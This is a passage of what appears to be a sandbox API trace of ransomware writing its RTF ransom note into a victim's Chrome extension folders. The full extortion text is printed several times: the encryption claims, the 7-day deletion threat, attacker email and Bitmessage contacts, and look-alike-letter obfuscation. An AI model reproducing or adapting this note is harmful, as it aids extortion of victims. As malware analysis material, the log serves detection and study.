ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.314] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.315] CloseHandle (hObject=0x294) returned 1 [0285.315] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0285.315] GetLastError () returned 0x2 [0285.315] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.315] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.315] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to 